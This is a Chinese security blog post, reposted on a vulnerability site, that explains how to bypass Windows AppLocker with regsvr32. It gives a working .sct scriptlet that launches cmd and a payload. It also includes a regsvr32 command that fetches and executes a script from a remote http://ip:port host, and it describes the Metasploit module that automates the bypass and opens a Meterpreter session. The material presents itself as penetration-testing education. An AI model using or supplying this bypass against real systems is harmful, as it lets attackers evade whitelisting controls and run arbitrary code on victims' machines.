CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 漏洞列表
  3. 正文

applocker

2018年11月12日 1048点热度 0人点赞 0条评论
  • FB招聘站
  • 分类阅读
  • 专栏
  • 公开课
  • FIT 2019
  • 企业服务
  • 用户服务
  • 搜索
  • 投稿
  • 登录
  • 注册

利用Regsvr32绕过Applocker的限制策略

鸢尾2017-05-28共543514人围观 ,发现 3 个不明物体终端安全

AppLocker的设计初衷就是为了帮助管理员Windows安装文件,可执行文件以及用户脚本的执行。从各种各样的奇淫巧计中我们得知这些限制是可以绕过的,例如在windows环境下通过AppLocker配置以限制脚本的执行,利用regsrv32命令行工具就可以完成绕过。

image

regsvr32是windows命令行实用工具用于注册动态链接库文件,向系统注册控件或者卸载控件的命令。Casey Smith发现通过调用regsrv32实用程序执行一条命令或者.sct文件有可能绕过AppLocker的脚本规则。由于该实用程序是由微软官方签名的所以好处多多啦,支持TLS加密,遵循重定向方式,不会在磁盘上留下痕迹。

以下脚本为Casey Smith提供的代码修改版,我们仅调用 calc.exe或cmd.exe。如果允许使用命令行提示符,脚本将在目标系统上执行自定义二进制代码:

<?XML version="1.0"?>
<scriptlet>
<registration         
progid="Pentest"       
classid="{F0001111-0000-0000-0000-0000FEEDACDC}" >
<script language="JScript">

<![CDATA[   
var r = new ActiveXObject("WScript.Shell").Run("cmd /k cd c:\ & pentestlab.exe"); 
]]>

</script>
</registration>
</scriptlet>

regsvr32实用工具可从托管的web服务器上请求以及执行脚本:

regsvr32 /u /n /s /i:http://ip:port/payload.sct scrobj.dll

image

regsrv32指令选项:

  • /s 静默执行
  • /n 指定不调用DllRegisterServer,此选项必须与/i共同使用
  • /i 调用DllInstall将它传递到可选的[cmdline],在与 /u 共同使用时,它调用DllUnstall
  • /u 反注册控件

当然也可以利用regsvr32在本地运行存储的有效载荷:

regsvr32 /u /n /s /i:payload.sct scrobj.dll

该命令将直接从托管文件的web服务器上执行脚本,嵌入.sct文件的JavaScript代码将引导pentestlab3.exe程序在命令提示符下执行。
image

由于pentestlab3是一个Metasploit payload,所以随后会打开一个Meterpreter会话:
image

当然,直接执行脚本还是会被拦截。但通过上面方法使用regsvr32进行绕过是可以的。image

Metasploit

Metasploit框架有一个特定的有效载荷,可用于通过Regsvr32实用程序实现自动化绕过AppLocker

exploit/windows/misc/regsvr32_applocker_bypass_server

该模块将启用一个用于存储恶意.sct文件的web服务,同时也提供用于在目标系统下执行的命令
image

命令执行后regsvr32将从web服务器请求.sct文件,然后执行PowerShell payload

image

最后成功绕过绕过AppLocker限制

image

参考资源

https://www.rapid7.com/db/modules/exploit/windows/misc/regsvr32_applocker_bypass_serverhttp://subt0x10.blogspot.co.uk/2017/04/bypass-application-whitelisting-script.html

*参考来源:pentestlab,freebuf小编鸢尾编译,转载请注明来自FreeBuf.com

鸢尾

鸢尾184 篇文章等级: 8级
|
|
  • 上一篇:一加手机OTA相关漏洞分析与利用
  • 下一篇:2017年第一季度中国手机安全状况报告
发表评论

已有 3 条评论

  • Scales (3级)剑未佩妥,出门便已是江湖。 2017-05-28回复1楼

    :eek:

    亮了(1)
  • xxxx 2017-05-28回复2楼

    告诉我,这是不是国内都已经玩烂了的东西。。。。国外现在才发现???我不信

    亮了(3)
  • 33333 2017-05-31回复3楼

    百度:Use SCT to Bypass Application Whitelisting Protection
    文章里有对这个利用方式的详细介绍

    亮了(2)

 

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

鸢尾

鸢尾

悟空竟在打飞机

184文章数132评论数

最近文章

CVE-2017-3085:Adobe Flash泄漏Windows用户凭证

2017.08.20

WSH注入技巧分享

2017.08.16

Brida:使用Frida进行移动应用渗透测试

2017.08.15

浏览更多

相关阅读

  • Android系统到底安不安全?细数Android7.0 Nougat的几大安全增强功能
  • Pwn2Own华为HiApp漏洞原理与利用分析(下)
  • Cloak & Dagger攻击:一种可针对所有版本Android的攻击技术(含演示视频)
  • Rogue Pi-基于树莓派的渗透Dropbox
  • 360 Vulpecker Team:BlueBorne蓝牙漏洞深入分析与PoC

特别推荐

关注我们 分享每日精选文章

活动预告

  • 11月

    FreeBuf精品公开课·双11学习狂欢节 | 给努力的你打打气

    已结束
  • 10月

    【16课时-连载中】挖掘CVE不是梦(系列课程2)

    已结束
  • 10月

    【首节课仅需1元】挖掘CVE不是梦

    已结束
  • 9月

    【已结束】自炼神兵之自动化批量刷SRC

    已结束

FREEBUF

  • 免责声明
  • 协议条款
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2018 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2018年11月12日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me